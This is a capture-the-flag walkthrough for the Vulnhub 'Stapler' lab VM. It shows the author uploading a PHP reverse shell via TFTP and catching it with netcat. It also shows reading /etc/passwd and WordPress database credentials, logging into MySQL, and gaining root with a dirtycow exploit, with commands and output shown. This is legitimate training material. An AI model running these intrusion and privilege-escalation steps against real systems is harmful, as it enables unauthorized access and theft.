[Vulnhub] stapler - Walkthrough

Vulnhub URI: https://www.vulnhub.com/entry/stapler-1,150/

Victim: 192.168.56.103  
Attacker: 192.168.56.102  

I used the silliest way to root this VM so do not laugh at me...


First netdiscover -r 192.168.56.0/24 to find the victim's IP.
Then a quick nmap

root@kali:~/vulnerhub/stapler# cat nmap.rst 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 11:49 EDT  
Nmap scan report for 192.168.56.103  
Host is up (-0.0050s latency).  
Not shown: 992 filtered ports  
PORT     STATE  SERVICE  
20/tcp   closed ftp-data  
21/tcp   open   ftp  
22/tcp   open   ssh  
53/tcp   open   domain  
80/tcp   open   http  
139/tcp  open   netbios-ssn  
666/tcp  open   doom  
3306/tcp open   mysql  
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 37.33 seconds  

Several ports are open, checked 80 port first.

It looks like a vulnerable site because it seems just fetch files from the server and return to users.

nikto didn't return me anything but dirb gives me interesting entries:

root@kali:~/vulnerhub/stapler# dirb http://192.168.56.103 /usr/share/wordlists/dirb/big.txt -X ,.php,.js,.html

-----------------
DIRB v2.22  
By The Dark Raver  
-----------------

START_TIME: Thu Aug 24 15:20:57 2017  
URL_BASE: http://192.168.56.103/  
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt  
EXTENSIONS_LIST: (,.php,.js,.html) | ()(.php)(.js)(.html) [NUM = 4]

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/.bashrc (CODE:200|SIZE:3771)                           
+ http://192.168.56.103/.profile (CODE:200|SIZE:675)                           

(!) FATAL: Too many errors connecting to host
    (Possible cause: EMPTY REPLY FROM SERVER)

-----------------
END_TIME: Thu Aug 24 15:21:08 2017  
DOWNLOADED: 9600 - FOUND: 2  

Looks like the location of the web content is a home directory.
I tried ../../../../../etc/passwd, .bashhistory, .ssh/knowhosts, but they didn't work which means it is either restricting dir changing or just a trolling page.
Assume it's the good situation, so if we could find a way to upload a file to here we might be able to get a shell or prove it's a fake page.


At this time my nmap finished the udp scan. And the result is promising:

root@kali:~/vulnerhub/stapler/note# nmap -Pn -sU 192.168.56.103

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 12:08 EDT  
Stats: 0:10:02 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan  
UDP Scan Timing: About 57.19% done; ETC: 12:25 (0:07:19 remaining)  
Nmap scan report for 192.168.56.103  
Host is up (0.00055s latency).  
Not shown: 995 closed ports  
PORT    STATE         SERVICE  
53/udp  open          domain  
68/udp  open|filtered dhcpc  
69/udp  open|filtered tftp  
137/udp open          netbios-ns  
138/udp open|filtered netbios-dgm  
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1100.98 seconds  

Look that! tftp!

root@kali:~/vulnerhub/stapler# tftp  
tftp> connect 192.168.56.103  
tftp> get .bashrc  
Received 3888 bytes in 0.0 seconds  
tftp> put shell.php  
Sent 5688 bytes in 0.0 seconds  
tftp>  

Great!
Looks like the tftp is located at the same directory as the 80 port service, and I can upload a file to that path.

My shell.php is based on /usr/share/webshells/php/php-reverse-shell.php

Time to receive the shell.

Go and visit http://192.168.56.103/shell.php, then the shell comes:

root@kali:~/vulnerhub/stapler# nc -l -p 9004  
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux  
 15:35:36 up  2:49,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT  
uid=1028(www) gid=1028(www) groups=1028(www)  
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ cd /home/www
$ ls -la
total 72  
drwxrwxrwx  2 www    www      4096 Aug 24 14:50 .  
drwxr-xr-x 32 root   root     4096 Jun  4  2016 ..  
-rw-r--r--  1 www    www       220 Sep  1  2015 .bash_logout
-rw-r--r--  1 www    www      3771 Sep  1  2015 .bashrc
-rw-r--r--  1 www    www       675 Sep  1  2015 .profile
-rw-r--r--  1 nobody nogroup  5496 Aug 24 15:31 shell.php

All right, the privilege escalating part.

Honestly, my first thought is to exploit overlayfs or use cowroot because of the version is old. But I want to explore more before fire the bullet.

So I did some recon work.
/etc/passwd:

root:x:0:0:root:/root:/bin/zsh  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false  
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false  
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false  
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false  
syslog:x:104:108::/home/syslog:/bin/false  
_apt:x:105:65534::/nonexistent:/bin/false  
lxd:x:106:65534::/var/lib/lxd/:/bin/false  
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false  
messagebus:x:108:111::/var/run/dbus:/bin/false  
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin  
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh  
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false  
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash  
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash  
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash  
AParnell:x:1004:1004::/home/AParnell:/bin/bash  
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash  
MBassin:x:1006:1006::/home/MBassin:/bin/bash  
JBare:x:1007:1007::/home/JBare:/bin/bash  
LSolum:x:1008:1008::/home/LSolum:/bin/bash  
IChadwick:x:1009:1009::/home/IChadwick:/bin/false  
MFrei:x:1010:1010::/home/MFrei:/bin/bash  
SStroud:x:1011:1011::/home/SStroud:/bin/bash  
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash  
JKanode:x:1013:1013::/home/JKanode:/bin/bash  
CJoo:x:1014:1014::/home/CJoo:/bin/bash  
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin  
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin  
JLipps:x:1017:1017::/home/JLipps:/bin/sh  
jamie:x:1018:1018::/home/jamie:/bin/sh  
Sam:x:1019:1019::/home/Sam:/bin/zsh  
Drew:x:1020:1020::/home/Drew:/bin/bash  
jess:x:1021:1021::/home/jess:/bin/bash  
SHAY:x:1022:1022::/home/SHAY:/bin/bash  
Taylor:x:1023:1023::/home/Taylor:/bin/sh  
mel:x:1024:1024::/home/mel:/bin/bash  
kai:x:1025:1025::/home/kai:/bin/sh  
zoe:x:1026:1026::/home/zoe:/bin/bash  
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash  
www:x:1028:1028::/home/www:  
postfix:x:112:118::/var/spool/postfix:/bin/false  
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false  
elly:x:1029:1029::/home/elly:/bin/bash  

And I checked all of there home directory but no one has any interesting files.
netstat:

$ netstat -nplt
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1434/php  
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -  
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:666             0.0.0.0:*               LISTEN      -  
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -  
tcp6       0      0 :::139                  :::*                    LISTEN      -  
tcp6       0      0 :::53                   :::*                    LISTEN      -  
tcp6       0      0 :::22                   :::*                    LISTEN      -  
tcp6       0      0 :::12380                :::*                    LISTEN      -  
tcp6       0      0 :::12380                :::*                    LISTEN      -  
tcp6       0      0 :::12380                :::*                    LISTEN      -  
tcp6       0      0 :::445                  :::*                    LISTEN      -  

/var/www/:

$ pwd
/var/www/https
$ ls -la
total 460  
drwxr-xr-x 5 root root   4096 Jun  5  2016 .  
drwxr-xr-x 3 root root   4096 Jun  6  2016 ..  
drwxr-xr-x 2 root root   4096 Jun  3  2016 admin112233  
drwxr-xr-x 2 root root   4096 Jun  4  2016 announcements  
drwxr-xr-x 5 root root   4096 Jun  4  2016 blogblog  
-rw-r--r-- 1 root root 434538 Jun  3  2016 custom_400.html
-rw-r--r-- 1 root root     92 Jun  4  2016 .htaccess
-rw-r--r-- 1 root root     21 Jun  5  2016 index.html
-rw-r--r-- 1 root root     59 Jun  3  2016 robots.txt
$ cat robots.txt
User-agent: *  
Disallow: /admin112233/  
Disallow: /blogblog/  

Here I found something, like the credentials for mysql.

$ cd blogblog
$ ls
index.php  
license.txt  
readme.html  
wordpress-4.2.1.tar.gz  
wp-activate.php  
wp-admin  
wp-blog-header.php  
wp-comments-post.php  
wp-config.php  
wp-config-sample.php  
wp-content  
wp-cron.php  
wp-includes  
wp-links-opml.php  
wp-load.php  
wp-login.php  
wp-mail.php  
wp-settings.php  
wp-signup.php  
wp-trackback.php  
xmlrpc.php  
$ cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');  
define('DB_USER', 'root');  
define('DB_PASSWORD', 'plbkac');  
define('DB_HOST', 'localhost');  
define('DB_CHARSET', 'utf8mb4');  
define('DB_COLLATE', '');  
$ 

So login to mysql:

root@kali:~/vulnerhub/stapler# mysql -h 192.168.56.103 -u root -p  
Enter password:  
Welcome to the MariaDB monitor.  Commands end with ; or \g.  
Your MySQL connection id is 11  
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;  
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.00 sec)  

There are many password and usernames inside those dbs, but I'm not sure which are for ssh.
At this point, I back to the reverse shell and tried to follow the traditional way:

$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null
/var/mail
/var/local
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/expiry
/usr/bin/newgidmap
/usr/bin/ssh-agent
/usr/bin/chage
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/wall
/usr/bin/crontab
/usr/bin/gpasswd
/usr/bin/ubuntu-core-launcher
/usr/bin/screen
/usr/local/share/fonts
/usr/local/share/zsh/site-functions
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/entities
/usr/local/share/sgml/misc
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/entities
/usr/local/share/xml/misc
/usr/local/share/xml/declaration
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/i386-linux-gnu/utempter/utempter
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/authbind/helper
/usr/sbin/postqueue
/usr/sbin/postdrop
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/ping6
/bin/su
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd

Here I saw two files: postqueue and postdrop. Googled it, turns out they are belong to postfix service which showed up in /etc/passwd.
Searched for it's exploitation and I found one, https://www.exploit-db.com/exploits/6337/
But it didn't work because I do not have write permission to /var/mail:

$ ./epl.sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
[*] Postfix seems to be installed
[*] Hardlink to symlink not dereferenced
[!] Spool dir is not writable

And that dir is belong to www-data but I was login as www.

$ ls -l /var/mail     
total 48  
-rw-r--r-- 1 root     mail     1 Jun  4  2016 root
-rw------- 1 www-data mail 39991 Jun  5  2016 www-data
$ whoami
www  

All I need is data :D
So I was wondering if I can start some web service and get the reverse shell of www-data then use this exploitation.
Or, if I found a way to ssh in as another user maybe there another way waiting for me.

So I start to try those kernel exploitation at this point. :D
First I tried overlayfs but it's not vulnerable, then I tried cowroot and then I back to mysql to search for more information without check the result (I though it was stuck! seriously)

I did find many hashed passwords and messages inside the db but I can't decrypt them with john in the short time.

When I decoding those passwords, I back to the 'stuck' reverse shell and type something:

$ ./cowroot
whoami  
root  
cd /root  
ls  
fix-wordpress.sh  
flag.txt  
issue  
python.sh  
wordpress.sql  
cat flag.txt  
~~~~~~~~<del><(Congratulations)></del>~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b  

Oh my. Happiness came without being prepared.


other things

Oh besides, I've also tried other ports.
from 666 port I got a message2.jpg, which looks like this:
And also:

root@kali:~/vulnerhub/stapler/message# steghide --info message2.jpg  
"message2.jpg":
  format: jpeg
  capacity: 318.0 Byte
Try to get information about embedded data ? (y/n) y  
Enter passphrase:  
steghide: could not extract any data with that passphrase!  

I didn't figure out the password yet.

(please check the previous part for root and flag)


Again, dirtycow is really powerful.

There are other ways to get reverse shell and root it, I believe other ways are more interesting.

Thanks g0tmi1k for providing this good practise.